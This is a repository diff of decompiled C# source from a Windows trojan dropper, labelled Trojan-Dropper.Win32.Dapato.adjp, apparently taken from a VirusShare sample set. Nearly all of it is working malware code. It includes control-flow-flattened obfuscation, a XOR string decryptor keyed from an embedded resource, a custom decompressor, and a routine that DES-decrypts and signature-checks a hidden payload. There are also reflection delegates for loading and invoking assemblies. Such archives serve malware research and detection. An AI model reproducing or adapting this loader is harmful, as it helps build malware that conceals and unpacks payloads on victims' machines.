public static readonly c.a a;
internal int[] b;
internal long[] c;
internal float[] d;
internal double[] e;
static a()
{
b.a();
c.a.a = new c.a();
}
private a() => this.a((Stream) l.a(y.a((object) x.a(), c.a)));
private void a(Stream a)
{
BinaryReader a1 = z.a(a);
label_2:
int num1 = 730339864;
int length1;
while (true)
{
switch (num1 ^ 732237328)
{
case 2954247:
this.b = new int[length1];
num1 = 730339866;
continue;
case 2954248:
length1 = aa.a((object) a1);
num1 = 730339865;
continue;
case 2954249:
if (length1 > 0)
{
num1 = 730339863;
continue;
}
goto label_9;
case 2954250:
goto label_8;
default:
goto label_2;
}
}
label_8:
while (--length1 >= 0)
this.b[length1] = aa.a((object) a1);
label_9:
int length2 = aa.a((object) a1);
while ((length2 <= 0 ? 0 : 1) != 0)
{
this.c = new long[length2];
while (--length2 >= 0)
this.c[length2] = ab.a((object) a1);
}
int length3 = aa.a((object) a1);
while ((length3 <= 0 ? 0 : 1) != 0)
{
this.d = new float[length3];
while (--length3 >= 0)
this.d[length3] = ac.a((object) a1);
}
label_32:
int num2 = 557462310;
int num3 = -384716687;
label_20:
while (true)
{
num3 ^= 379780358;
label_24:
int num4 = -1442227832;
int num5 = -712615296;
while (true)
{
switch ((num5 ^ 707200521) + 6202233)
{
case 0:
goto label_24;
case 1:
switch (num4 + 6308697)
{
case 0:
switch (num3 + 5026443)
{
case 0:
switch (num2)
{
case 3012693:
length3 = aa.a((object) a1);
num2 = 557462309;
goto label_19;
case 3012694:
goto label_37;
default:
goto label_31;
}
case 1:
goto label_32;
case 2:
label_19:
num2 ^= 555207539;
goto label_29;
default:
num4 = -1442227833;
goto label_21;
}
case 1:
label_29:
num3 = -384716685;
num4 = -1442227834;
goto label_21;
case 2:
goto label_20;
default:
num5 = -712615282;
continue;
}
case 2:
label_21:
num4 ^= 1435952431;
break;
}
num5 = -712615295;
}
label_31:
num3 = -384716688;
}
label_37:
while ((length3 <= 0 ? 0 : 1) != 0)
{
this.e = new double[length3];
while (--length3 >= 0)
this.e[length3] = ad.a((object) a1);
}
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/d.cs
+1248
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/e.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: e
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.IO;
using System.Reflection;
internal sealed class e
{
public static string a(string a1, int a2) => ae.a(e.a.a.a(a1, a2));
public static string a => "79af91d13cf045e9";
private sealed class a
{
public static readonly e.a a;
private byte[] b;
static a()
{
b.a();
e.a.a = new e.a();
}
private a()
{
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(e.a);
if (manifestResourceStream == null)
return;
this.b = new byte[256];
manifestResourceStream.Read(this.b, 0, this.b.Length);
}
public string a(string a1, int a2)
{
int index1 = af.a((object) a1);
int index2 = a2 & (int) byte.MaxValue;
char[] a = ag.a((object) a1);
while (--index1 >= 0)
a[index1] = (char) ((uint) a[index1] ^ ((uint) this.b[index2] | (uint) a2));
return ae.a(ah.a(a));
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/f.cs
+1054
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/g.cs
+11
View File
@@ -0,0 +1,11 @@
// Decompiled with JetBrains decompiler
// Type: g
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal struct g
{
public int a;
public int b;
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/h.cs
+13
View File
@@ -0,0 +1,13 @@
// Decompiled with JetBrains decompiler
// Type: h
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal sealed class h
{
internal bool a;
internal ushort b;
internal h c;
internal h d;
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/i.cs
+11
View File
@@ -0,0 +1,11 @@
// Decompiled with JetBrains decompiler
// Type: i
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal sealed class i
{
internal h a;
internal h b;
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/j.cs
+798
View File
@@ -0,0 +1,798 @@
// Decompiled with JetBrains decompiler
// Type: j
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
using System.IO;
internal sealed class j
{
public static void a(Stream a1, Stream a2)
{
byte[] numArray = new byte[4096];
j.a a = new j.a(a1);
while (true)
{
int count = a.a(numArray, 0, numArray.Length);
if ((count <= 0 ? 0 : 1) != 0)
a2.Write(numArray, 0, count);
else
break;
}
}
public sealed class a
{
private j.c a = new j.c(32769);
private j.b b;
private i c;
private int d = -1;
private int e = -1;
private bool f;
private int g;
private long h;
private long i;
private bool j;
private int k;
private bool l;
public a(Stream a) => this.b = new j.b(a);
public int a(byte[] a1, int a2, int a3)
{
if ((a1 == null ? 0 : 1) == 0)
throw new ArgumentNullException();
if (a3 == 0 || this.j)
return 0;
int num1 = 0;
label_15:
while (num1 < a3)
{
while (this.d < 0 && !this.j)
this.j = !this.a();
if (!this.j)
{
int num2 = this.b(a1, a2 + num1, a3 - num1);
label_10:
int num3 = 0;
while (true)
{
switch (num3)
{
case 0:
if (num2 > 0)
{
num3 = 1;
continue;
}
goto label_14;
case 1:
num1 += num2;
num3 = 2;
continue;
case 2:
goto label_15;
default:
goto label_10;
}
}
label_14:
this.d = -1;
}
else
break;
}
return num1;
}
private bool a()
{
if ((!this.f ? 1 : 0) == 0)
return false;
this.h = this.b.e;
label_4:
int num1 = 2;
int d;
while (true)
{
switch (num1)
{
case 0:
switch (d)
{
case 0:
goto label_10;
case 1:
goto label_13;
case 2:
goto label_14;
default:
num1 = 4;
continue;
}
case 1:
this.d = this.b.a(2);
num1 = 3;
continue;
case 2:
this.f = this.b.a(1) > 0;
num1 = 1;
continue;
case 3:
d = this.d;
num1 = 0;
continue;
case 4:
goto label_15;
default:
goto label_4;
}
}
label_10:
this.b.a();
int num2 = this.b.a(16);
int num3 = this.b.a(16);
this.g = (num2 & ~num3) == num2 ? num2 : throw new InvalidOperationException();
this.c = (i) null;
this.l = true;
goto label_16;
label_13:
g[] r = f.r;
g[] s = f.s;
this.g = 0;
this.c = f.t;
this.l = false;
goto label_16;
label_14:
g[] a1;
g[] a2;
this.a(this.b, out a1, out a2);
this.g = 0;
this.c = f.a(a1, a2);
this.l = false;
goto label_16;
label_15:
throw new InvalidOperationException();
label_16:
this.i = this.b.e;
return true;
}
private int b(byte[] a1, int a2, int a3)
{
int num1 = a2;
if ((this.d == 0 ? 0 : 1) == 0)
{
if (this.g > 0)
{
int a = Math.Min(a3, this.g);
label_4:
int num2 = 3;
while (true)
{
switch (num2)
{
case 0:
a2 += a;
num2 = 5;
continue;
case 1:
a3 -= a;
num2 = 0;
continue;
case 2:
this.a.a(a1, a2, a);
num2 = 4;
continue;
case 3:
this.b.a(a1, a2, a);
num2 = 2;
continue;
case 4:
this.g -= a;
num2 = 1;
continue;
case 5:
goto label_22;
default:
goto label_4;
}
}
}
}
else if (!this.l)
{
if (this.k > 0)
this.a(a1, ref a2, ref a3);
if (a3 > 0)
{
do
{
int a = j.a.a(this.b, this.c.a);
this.l = a == 256;
if (!this.l)
{
if (a < 256)
{
a1[a2++] = (byte) a;
this.a.a((byte) a);
--a3;
}
else if (a <= 285)
{
int num3 = j.a.a(this.b, a);
int num4 = j.a.b(this.b, this.c.b);
if ((long) num4 > this.a.d)
throw new InvalidOperationException();
this.e = num4;
this.k = num3;
this.a(a1, ref a2, ref a3);
}
}
else
break;
}
while (a3 > 0);
}
}
label_22:
this.i = this.b.e;
return a2 - num1;
}
private void a(byte[] a1, ref int a2, ref int a3)
{
int num1 = Math.Min(this.k, a3);
byte[] numArray = this.a.a(this.e, Math.Min(num1, this.e));
a3 -= num1;
this.k -= num1;
while ((num1 <= numArray.Length ? 0 : 1) != 0)
{
Array.Copy((Array) numArray, 0, (Array) a1, a2, numArray.Length);
label_3:
int num2 = 0;
while (true)
{
switch (num2)
{
case 0:
a2 += numArray.Length;
num2 = 1;
continue;
case 1:
num1 -= numArray.Length;
num2 = 2;
continue;
case 2:
goto label_6;
default:
goto label_3;
}
}
label_6:
this.a.a(numArray, 0, numArray.Length);
}
Array.Copy((Array) numArray, 0, (Array) a1, a2, num1);
a2 += num1;
this.a.a(numArray, 0, num1);
}
public bool a(int a)
{
byte[] a1 = new byte[1024];
int num;
while (a > 0 && ((num = this.a(a1, 0, Math.Min(1024, a))) <= 0 ? 0 : 1) != 0)
a -= num;
return a <= 0;
}
public void a()
{
byte[] a = new byte[1024];
do
;
while (this.a(a, 0, 1024) > 0);
}
private static int a(j.b a1, h a2)
{
while (true)
{
if (a2 == null)
goto label_7;
else
goto label_4;
label_3:
int num;
while (true)
{
switch (num)
{
case 0:
if (a2.a)
{
num = 1;
continue;
}
goto label_1;
case 1:
goto label_7;
case 2:
goto label_9;
default:
goto label_4;
}
}
label_1:
a2 = (a1.a(1) <= 0 ? 0 : 1) != 0 ? a2.d : a2.c;
continue;
label_4:
num = 0;
goto label_3;
label_7:
if (a2 == null)
{
num = 2;
goto label_3;
}
else
goto label_10;
}
label_9:
throw new InvalidOperationException();
label_10:
return (int) a2.b;
}
private static int a(j.b a1, int a2)
{
int a3;
int a4;
f.a(a2, out a3, out a4);
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
if (a4 > 0)
{
num = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_5:
return a3 + a1.a(a4);
label_6:
return a3;
}
private static int b(j.b a1, h a2)
{
int index = j.a.a(a1, a2);
int num1 = index <= 29 ? f.x[index] : throw new InvalidOperationException();
label_4:
int num2 = 1;
int a;
int num3;
while (true)
{
switch (num2)
{
case 0:
if (a > 0)
{
num2 = 4;
continue;
}
goto label_15;
case 1:
a = f.y[index];
num2 = 0;
continue;
case 2:
if (index == 284)
{
num2 = 3;
continue;
}
goto label_14;
case 3:
if (num3 > 30)
{
num2 = 5;
continue;
}
goto label_14;
case 4:
num3 = a1.a(a);
num2 = 2;
continue;
case 5:
goto label_13;
default:
goto label_4;
}
}
label_13:
throw new InvalidOperationException();
label_14:
return num1 + num3;
label_15:
return num1;
}
private void a(j.b a1, out g[] a2, out g[] a3)
{
int length1 = a1.a(5) + 257;
label_2:
int num1 = 1;
int num2;
int length2;
while (true)
{
switch (num1)
{
case 0:
num2 = a1.a(4) + 4;
num1 = 2;
continue;
case 1:
length2 = a1.a(5) + 1;
num1 = 0;
continue;
case 2:
if (length1 > 286)
{
num1 = 3;
continue;
}
goto label_8;
case 3:
goto label_7;
default:
goto label_2;
}
}
label_7:
throw new InvalidOperationException();
label_8:
int[] u = f.u;
int[] a4 = new int[19];
int index1 = 0;
if ((index1 == 0 ? 1 : 0) != 0)
goto label_10;
label_9:
a4[u[index1]] = a1.a(3);
++index1;
label_10:
if (index1 >= num2)
{
h a5 = f.a(f.a(a4));
int[] numArray = j.a.a(a1, a5, length1 + length2);
a2 = new g[length1];
for (int index2 = 0; index2 < length1; ++index2)
a2[index2].b = numArray[index2];
f.a(a2);
a3 = new g[length2];
for (int index3 = 0; index3 < length2; ++index3)
a3[index3].b = numArray[index3 + length1];
f.a(a3);
}
else
goto label_9;
}
private static int[] a(j.b a1, h a2, int a3)
{
int[] numArray = new int[a3];
int index1 = 0;
if ((index1 == 0 ? 1 : 0) != 0)
goto label_22;
label_1:
int num1 = j.a.a(a1, a2);
label_3:
int num2 = 1;
while (true)
{
switch (num2)
{
case 0:
numArray[index1] = num1;
num2 = 2;
continue;
case 1:
if (num1 < 16)
{
num2 = 0;
continue;
}
goto label_7;
case 2:
goto label_21;
default:
goto label_3;
}
}
label_7:
switch (num1)
{
case 16:
int num3 = a1.a(2) + 3;
if (num3 + index1 > numArray.Length)
throw new InvalidOperationException();
for (int index2 = 0; index2 < num3; ++index2)
numArray[index1 + index2] = numArray[index1 - 1];
index1 += num3 - 1;
break;
case 17:
int num4 = a1.a(3) + 3;
if (num4 + index1 > numArray.Length)
throw new InvalidOperationException();
index1 += num4 - 1;
break;
case 18:
int num5 = a1.a(7) + 11;
if (num5 + index1 > numArray.Length)
throw new InvalidOperationException();
index1 += num5 - 1;
break;
default:
throw new InvalidOperationException();
}
label_21:
++index1;
label_22:
if (index1 >= a3)
return numArray;
goto label_1;
}
}
private sealed class b
{
private uint a;
private int b;
private int c;
private Stream d;
internal long e;
internal b(Stream a) => this.d = a;
internal int a(int a)
{
this.e += (long) a;
for (int index = a - (this.c - this.b); (index <= 0 ? 0 : 1) != 0; index -= 8)
{
this.a |= checked ((uint) this.d.ReadByte()) << this.c;
this.c += 8;
}
int num1 = (int) (this.a >> this.b) & (1 << a) - 1;
label_5:
int num2 = 2;
while (true)
{
switch (num2)
{
case 0:
this.c = this.b = 0;
num2 = 1;
continue;
case 1:
this.a = 0U;
num2 = 4;
continue;
case 2:
this.b += a;
num2 = 3;
continue;
case 3:
if (this.c == this.b)
{
num2 = 0;
continue;
}
goto label_11;
case 4:
goto label_13;
default:
goto label_5;
}
}
label_11:
if (this.b >= 8)
{
this.a >>= this.b;
this.c -= this.b;
this.b = 0;
}
label_13:
return num1;
}
internal void a()
{
if (this.c != this.b)
this.e += (long) (this.c - this.b);
this.c = this.b = 0;
label_4:
int num = 0;
while (true)
{
switch (num)
{
case 0:
this.a = 0U;
num = 1;
continue;
case 1:
goto label_6;
default:
goto label_4;
}
}
label_6:;
}
internal void a(byte[] a1, int a2, int a3)
{
if (this.c != this.b)
throw new InvalidOperationException();
int num1 = this.d.Read(a1, a2, a3);
label_4:
int num2 = 0;
while (true)
{
switch (num2)
{
case 0:
this.e += (long) (num1 << 3);
num2 = 1;
continue;
case 1:
if (num1 != a3)
{
num2 = 2;
continue;
}
goto label_7;
case 2:
goto label_9;
default:
goto label_4;
}
}
label_7:
return;
label_9:
throw new InvalidOperationException();
}
}
private sealed class c
{
private byte[] a;
private int b;
internal int c;
internal long d;
internal c(int a)
{
this.c = a;
this.a = new byte[a];
}
internal void a(byte a)
{
this.a[this.b++] = a;
if ((this.b >= this.c ? 0 : 1) == 0)
this.b = 0;
++this.d;
}
internal void a(byte[] a1, int a2, int a3)
{
this.d += (long) a3;
if ((a3 >= this.c ? 0 : 1) == 0)
{
Array.Copy((Array) a1, a2, (Array) this.a, 0, this.c);
this.b = 0;
}
else if (this.b + a3 > this.c)
{
int length1 = this.c - this.b;
label_5:
int num = 2;
int length2;
while (true)
{
switch (num)
{
case 0:
Array.Copy((Array) a1, a2 + length1, (Array) this.a, 0, length2);
num = 1;
continue;
case 1:
this.b = length2;
num = 4;
continue;
case 2:
length2 = this.b + a3 - this.c;
num = 3;
continue;
case 3:
Array.Copy((Array) a1, a2, (Array) this.a, this.b, length1);
num = 0;
continue;
case 4:
goto label_12;
default:
goto label_5;
}
}
label_12:;
}
else
{
Array.Copy((Array) a1, a2, (Array) this.a, this.b, a3);
this.b += a3;
if (this.b != this.c)
return;
this.b = 0;
}
}
internal byte[] a(int a1, int a2)
{
byte[] destinationArray = new byte[a2];
if ((this.b >= a1 ? 0 : 1) == 0)
{
Array.Copy((Array) this.a, this.b - a1, (Array) destinationArray, 0, a2);
}
else
{
int num1 = a1 - this.b;
label_4:
int num2 = 1;
while (true)
{
switch (num2)
{
case 0:
Array.Copy((Array) this.a, 0, (Array) destinationArray, num1, a2 - num1);
num2 = 3;
continue;
case 1:
if (num1 < a2)
{
num2 = 2;
continue;
}
goto label_9;
case 2:
Array.Copy((Array) this.a, this.c - num1, (Array) destinationArray, 0, num1);
num2 = 0;
continue;
case 3:
goto label_10;
default:
goto label_4;
}
}
label_9:
Array.Copy((Array) this.a, this.c - num1, (Array) destinationArray, 0, a2);
}
label_10:
return destinationArray;
}
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/k.cs
+1565
View File
File diff suppressed because it is too large Load Diff
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/l.cs
+419
View File
@@ -0,0 +1,419 @@
// Decompiled with JetBrains decompiler
// Type: l
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
internal sealed class l
{
private const int a = 8;
private const int b = 20;
private const int c = 4;
private static byte[] d = new byte[4];
private static byte[] e;
static l()
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
l.e = new byte[4];
num = 4;
continue;
case 1:
l.d[1] = l.e[1] = (byte) 83;
num = 3;
continue;
case 2:
l.e[3] = (byte) 50;
num = 6;
continue;
case 3:
l.d[2] = l.e[2] = (byte) 65;
num = 5;
continue;
case 4:
l.d[0] = l.e[0] = (byte) 82;
num = 1;
continue;
case 5:
l.d[3] = (byte) 49;
num = 2;
continue;
case 6:
goto label_9;
default:
goto label_2;
}
}
label_9:;
}
public static MemoryStream a(Stream a)
{
BinaryReader binaryReader1 = new BinaryReader(a);
DESCryptoServiceProvider cryptoServiceProvider = new DESCryptoServiceProvider();
bool flag1 = binaryReader1.ReadBoolean();
int count1 = (int) binaryReader1.ReadUInt16();
byte[] buffer1 = new byte[count1];
binaryReader1.Read(buffer1, 0, count1);
if ((!flag1 ? 1 : 0) == 0)
{
byte[] buffer2 = new byte[8];
binaryReader1.Read(buffer2, 0, 8);
for (int index = 0; index < count1; ++index)
buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]);
}
BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false));
label_6:
int num = 7;
int count2;
int count3;
bool flag2;
byte[] numArray1;
byte[] buffer3;
bool flag3;
while (true)
{
switch (num)
{
case 0:
count2 = (int) binaryReader2.ReadByte();
num = 3;
continue;
case 1:
count3 = (int) binaryReader2.ReadByte();
num = 8;
continue;
case 2:
flag2 = binaryReader2.ReadBoolean();
num = 0;
continue;
case 3:
numArray1 = new byte[count2];
num = 4;
continue;
case 4:
if (flag2)
{
num = 10;
continue;
}
goto label_19;
case 5:
binaryReader2.Read(buffer3, 0, count3);
num = 6;
continue;
case 6:
cryptoServiceProvider.IV = buffer3;
num = 2;
continue;
case 7:
binaryReader2.ReadString();
num = 9;
continue;
case 8:
buffer3 = new byte[count3];
num = 5;
continue;
case 9:
flag3 = binaryReader2.ReadBoolean();
num = 1;
continue;
case 10:
goto label_18;
default:
goto label_6;
}
}
label_18:
binaryReader2.Read(numArray1, 0, count2);
label_19:
RSACryptoServiceProvider a1 = (RSACryptoServiceProvider) null;
int count4 = binaryReader2.ReadInt32();
byte[] numArray2 = new byte[count4];
binaryReader2.Read(numArray2, 0, count4);
if (!flag2)
{
byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey();
if (publicKey == null || publicKey.Length != 160)
throw new InvalidOperationException();
Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray1, 0, count2);
numArray1[5] |= (byte) 128;
a1 = new RSACryptoServiceProvider();
a1.ImportParameters(l.a(publicKey));
}
cryptoServiceProvider.Key = numArray1;
MemoryStream a2 = new MemoryStream();
using (CryptoStream a3 = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider.CreateDecryptor(), CryptoStreamMode.Read))
{
if (flag3)
j.a((Stream) a3, (Stream) a2);
else
l.a((Stream) a3, (Stream) a2);
}
if (a1 != null)
{
a2.Position = 0L;
if (!l.a(a1, (Stream) a2, numArray2))
throw new InvalidOperationException();
}
a2.Position = 0L;
return a2;
}
private static byte[] a(byte[] a1, int a2, int a3)
{
if ((a1 == null ? 1 : 0) == 0)
{
label_2:
int num = 0;
while (true)
{
switch (num)
{
case 0:
if (a1.Length < a2 + a3)
{
num = 1;
continue;
}
goto label_6;
case 1:
goto label_5;
default:
goto label_2;
}
}
label_6:
byte[] destinationArray = new byte[a3];
Array.Copy((Array) a1, a2, (Array) destinationArray, 0, a3);
return destinationArray;
}
label_5:
return (byte[]) null;
}
private static void a(Stream a1, Stream a2)
{
byte[] buffer = new byte[4096];
while (true)
{
int count = a1.Read(buffer, 0, buffer.Length);
if ((count <= 0 ? 0 : 1) != 0)
a2.Write(buffer, 0, count);
else
break;
}
}
private static RSAParameters a(byte[] a)
{
bool flag = a.Length == 160;
if ((!flag ? 1 : 0) == 0 && !l.a(a, l.d, 20))
return new RSAParameters();
if (!flag && !l.a(a, l.e, 8))
return new RSAParameters();
RSAParameters rsaParameters = new RSAParameters();
int a1 = (flag ? 20 : 8) + 8;
int a2 = 4;
rsaParameters.Exponent = l.a(a, a1, a2);
Array.Reverse((Array) rsaParameters.Exponent);
int a3 = a1 + a2;
int a4 = 128;
rsaParameters.Modulus = l.a(a, a3, a4);
Array.Reverse((Array) rsaParameters.Modulus);
if (flag)
return rsaParameters;
int a5 = a3 + a4;
label_8:
int num = 14;
while (true)
{
switch (num)
{
case 0:
rsaParameters.P = l.a(a, a5, a4);
num = 12;
continue;
case 1:
rsaParameters.DQ = l.a(a, a5, a4);
num = 6;
continue;
case 2:
a5 += a4;
num = 15;
continue;
case 3:
rsaParameters.D = l.a(a, a5, a4);
num = 10;
continue;
case 4:
a5 += a4;
num = 7;
continue;
case 5:
rsaParameters.InverseQ = l.a(a, a5, a4);
num = 9;
continue;
case 6:
Array.Reverse((Array) rsaParameters.DQ);
num = 2;
continue;
case 7:
a4 = 64;
num = 1;
continue;
case 8:
a4 = 64;
num = 17;
continue;
case 9:
Array.Reverse((Array) rsaParameters.InverseQ);
num = 13;
continue;
case 10:
Array.Reverse((Array) rsaParameters.D);
num = 23;
continue;
case 11:
Array.Reverse((Array) rsaParameters.DP);
num = 4;
continue;
case 12:
Array.Reverse((Array) rsaParameters.P);
num = 16;
continue;
case 13:
a5 += a4;
num = 19;
continue;
case 14:
a4 = 64;
num = 0;
continue;
case 15:
a4 = 64;
num = 5;
continue;
case 16:
a5 += a4;
num = 21;
continue;
case 17:
rsaParameters.DP = l.a(a, a5, a4);
num = 11;
continue;
case 18:
rsaParameters.Q = l.a(a, a5, a4);
num = 20;
continue;
case 19:
a4 = 128;
num = 3;
continue;
case 20:
Array.Reverse((Array) rsaParameters.Q);
num = 22;
continue;
case 21:
a4 = 64;
num = 18;
continue;
case 22:
a5 += a4;
num = 8;
continue;
case 23:
goto label_32;
default:
goto label_8;
}
}
label_32:
return rsaParameters;
}
private static bool a(byte[] a1, byte[] a2, int a3)
{
int index = 0;
if ((index == 0 ? 1 : 0) != 0)
goto label_7;
else
goto label_2;
label_1:
int num;
switch (num)
{
case 0:
goto label_3;
case 1:
return false;
}
label_2:
num = 0;
goto label_1;
label_3:
if ((int) a1[index + a3] != (int) a2[index])
{
num = 1;
goto label_1;
}
else
++index;
label_7:
if (index >= a2.Length)
return true;
goto label_3;
}
private static bool a(RSACryptoServiceProvider a1, Stream a2, byte[] a3)
{
SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider();
label_2:
int num = 0;
byte[] hash;
string name;
while (true)
{
switch (num)
{
case 0:
hash = cryptoServiceProvider.ComputeHash(a2);
num = 3;
continue;
case 1:
name += (string) (object) 'A';
num = 4;
continue;
case 2:
name += (string) (object) 'H';
num = 1;
continue;
case 3:
name = new string('S', 1);
num = 2;
continue;
case 4:
name += (string) (object) '1';
num = 5;
continue;
case 5:
goto label_8;
default:
goto label_2;
}
}
label_8:
return a1.VerifyHash(hash, CryptoConfig.MapNameToOID(name), a3);
}
}
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/m.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: m
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
internal delegate AppDomain m();
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/n.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: n
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.Reflection;
internal delegate Assembly n(object _param1, byte[] _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/o.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: o
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System;
internal delegate Type o(object _param1, string _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/p.cs
+9
View File
@@ -0,0 +1,9 @@
// Decompiled with JetBrains decompiler
// Type: p
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
using System.Reflection;
internal delegate MethodInfo p(object _param1, string _param2);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/q.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: q
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: BEDD3B0B-7024-4DCA-82E7-4DC806657EA8
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46.exe
internal delegate object q(object _param1, object _param2, object[] _param3);
MSIL/Trojan-Dropper/Win32/D/Trojan-Dropper.Win32.Dapato.adjp-c7222843a23fc031926828311c4204ba181271a1dde91017bc4695dc95b5fc46/r.cs
+7
View File
@@ -0,0 +1,7 @@
// Decompiled with JetBrains decompiler
// Type: r
// Assembly: Fugi, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
